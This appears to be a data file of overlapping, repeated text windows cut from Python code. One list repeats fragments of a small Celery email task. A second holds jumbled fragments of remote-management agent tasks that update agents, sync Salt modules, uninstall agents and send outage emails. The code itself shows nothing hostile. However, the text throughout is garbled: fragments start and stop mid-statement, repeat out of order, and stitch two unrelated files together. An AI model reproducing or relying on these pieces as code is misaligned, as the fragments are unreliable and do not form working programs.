# # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012", "30, 2012 # from celery.task import task from d3status.mail import send_email @task def", "Jun 30, 2012 # from celery.task import task from d3status.mail import send_email @task", "All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun 30,", "d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to,", "utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights reserved. # #", "(c) 2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> # Created", "feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun", "-*- coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights reserved.", "<gh_stars>100-1000 # -*- coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All", "send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body,", "-*- # # Copyright (c) 2012 feilong.me. All rights reserved. # # @author:", "@author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task import", "# -*- coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights", "from celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to, subject,", "# Created on Jun 30, 2012 # from celery.task import task from d3status.mail", "reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 #", "import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject,", "coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights reserved. #" ]
[ "online = [i.salt_id for i in agents if i.status == \"online\"] chunks =", "no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r ==", "return q = Agent.objects.all() agents = [ i.pk for i in q if", "len(agents), 30)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk)", "def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents", "if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage", "return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent =", "packaging import version as pyver from django.conf import settings from tacticalrmm.celery import app", "agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail", "Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER)", "[i.salt_id for i in agents if i.status == \"online\"] chunks = (online[i :", "def uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try: r =", "from django.conf import settings from tacticalrmm.celery import app from agents.models import Agent, AgentOutage", "or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task", "salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split", "= settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if", "agents to not overload salt agents = Agent.objects.all() online = [i.salt_id for i", "in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30]", "agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in 
agent.operating_system: arch", "= \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\"", "WMI agents = Agent.objects.all() online = [ i.salt_id for i in agents if", "q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version) <", "AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage =", "q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30] for", "\"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\"", "else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" )", "\"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10,", "# sync modules, split into chunks of 50 agents to not overload salt", "@app.task def batch_sync_modules_task(): # sync modules, split into chunks of 50 agents to", "break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r", "import version as pyver from django.conf import settings from tacticalrmm.celery import app from", "in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20)", "attempts += 1 else: if ret != \"ok\": attempts += 1 else: attempts", "if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\":", "0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try:", "import settings from tacticalrmm.celery import app from agents.models 
import Agent, AgentOutage from core.models", "}, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return", "q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30]", "= (online[i : i + 30] for i in range(0, len(online), 30)) for", "system info using WMI agents = Agent.objects.all() online = [ i.salt_id for i", "json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\":", "pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\"", "!= \"ok\": attempts += 1 else: attempts = 0 if attempts >= 10:", "True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if", "if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch =", "remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email()", "+ 30] for i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk,", "== \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully", "arch = \"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno", "url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update:", "[{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15':", "\"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\"", "pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < 
pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50]", "on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks", "chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task", "chunks = (online[i : i + 50] for i in range(0, len(online), 50))", "if not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for i", "def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if", "== \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk):", "import os import subprocess from loguru import logger from time import sleep import", "== \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else", "import subprocess from loguru import logger from time import sleep import random import", "failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ {", "i.status == \"online\" ] chunks = (online[i : i + 30] for i", "os import subprocess from loguru import logger from time import sleep import random", "+= 1 else: attempts = 0 if attempts >= 10: error = True", ") except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk):", "True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent =", "for i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10)", "chunks = (agents[i : i + 50] for i in range(0, len(agents), 50))", 
"r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\":", "q = Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version)", "chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info", "to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk)", "assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q", "# update system info using WMI agents = Agent.objects.all() online = [ i.salt_id", "@app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"])", "url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [", "@app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync", "f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD,", "= Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) >=", "outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status", "\"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url,", "version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in", "= Agent.objects.all() online = [ i.salt_id for i in agents if not 
i.not_supported(\"0.11.0\")", "1 else: attempts = 0 if attempts >= 10: error = True break", "sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged", "[]}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules", "tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG)", "\"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30,", "requests from packaging import version as pyver from django.conf import settings from tacticalrmm.celery", "import app from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task", ": i + 50] for i in range(0, len(agents), 50)) for chunk in", "[i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i :", "into chunks of 50 agents to not overload salt agents = Agent.objects.all() online", "break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id}", "range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task():", "0 if attempts >= 10: error = True break elif attempts == 0:", "len(agents), 50)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk)", "agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks =", "] chunks = (online[i : i + 30] for i in range(0, len(online),", "elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was", "\"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] 
except Exception:", "chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False", "from loguru import logger from time import sleep import random import requests from", "random import requests from packaging import version as pyver from django.conf import settings", "outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if", "sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk):", "[ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\"", "agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if", "= True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent", "== 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\")", "agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\")", "pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for i in range(0,", "= [ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver)", "\"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk)", "= \"64\" url = 
settings.DL_64 if arch == \"64\" else settings.DL_32 inno =", "pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i", "send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i", "= Agent.objects.all() online = [i.salt_id for i in agents if i.status == \"online\"]", "sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task", "successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync", "app from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def", "\"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all()", "\"32\" else: arch = \"64\" url = settings.DL_64 if arch == \"64\" else", "chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system:", "logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return", "0 error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ {", "outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent", "is not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in", "func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI agents =", "def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\"", "== \"online\"] chunks = 
(online[i : i + 50] for i in range(0,", "not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for i in", "\"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save()", "import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks)", "agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk)", "\"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, )", "[{'MINION-15': []}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync", "elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\" url =", "agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages =", "if attempts >= 10: error = True break elif attempts == 0: break", "batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all() online = [", "salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent", "= agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return \"failed\"", "def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\":", "\"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents =", "if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if", "requests.post( 
f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\":", "unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage =", "\"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first()", "\"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, )", "+ 30] for i in range(0, len(agents), 30)) for chunk in chunks: for", "modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def", "if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30] for i", "else: arch = \"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32", "agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]}", "None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch", "== \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\":", "= True break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\")", "sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with", "\"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\"", "from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def 
send_agent_update_task(pks,", "r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\":", "sleep import random import requests from packaging import version as pyver from django.conf", "i + 30] for i in range(0, len(agents), 30)) for chunk in chunks:", "kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core =", "\"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret", "= True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents:", "core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q =", "overload salt agents = Agent.objects.all() online = [i.salt_id for i in agents if", "50] for i in range(0, len(agents), 50)) for chunk in chunks: for pk", "files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable", "chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI", "pyver from django.conf import settings from tacticalrmm.celery import app from agents.models import Agent,", "CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents", "= Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r ==", "(agents[i : i + 30] for i in range(0, len(agents), 30)) for chunk", "Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) 
r =", "(online[i : i + 50] for i in range(0, len(online), 50)) for chunk", "= [i.salt_id for i in agents if i.status == \"online\"] chunks = (online[i", "agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage =", "Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch = \"64\"", "= agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def", "sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try:", "= ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async(", "50] for i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\")", "== \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\":", "[ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) <", "def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task", "f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME,", "timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def", "AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for", "settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" 
else f\"winagent-v{version}-x86.exe\" ) r", "i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i +", "def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i in q", "\"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", }", "< pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for i in", "settings from tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models import", "= \"32\" else: arch = \"64\" url = settings.DL_64 if arch == \"64\"", "pyver.parse(version)] chunks = (agents[i : i + 30] for i in range(0, len(agents),", "files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files:", "\"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\")", "for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i", "\"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\" url = settings.DL_64", "settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch", "else: if ret != \"ok\": attempts += 1 else: attempts = 0 if", "def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task", "\"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno = (", ") ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret !=", "settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts", "json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", 
\"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\":", "agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def", ": i + 30] for i in range(0, len(online), 30)) for chunk in", "settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except", "Agent.objects.all() online = [i.salt_id for i in agents if i.status == \"online\"] chunks", "agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def", "= Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)]", "sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r", "func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail =", "agents = [ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and", "@app.task def batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all() online", "except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1,", "outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents =", "in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks =", "django.conf import settings from 
tacticalrmm.celery import app from agents.models import Agent, AgentOutage from", "[ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks =", "from packaging import version as pyver from django.conf import settings from tacticalrmm.celery import", "i in range(0, len(agents), 50)) for chunk in chunks: for pk in chunk:", "i in agents if i.status == \"online\"] chunks = (online[i : i +", "if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r =", "= [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status ==", "if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif", "settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove", "Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15))", "}, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk", "{ \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\",", "= (agents[i : i + 30] for i in range(0, len(agents), 30)) for", "chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error", "inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if", "r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"])", "AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list)", "in chunks: for pk in chunk: agent = 
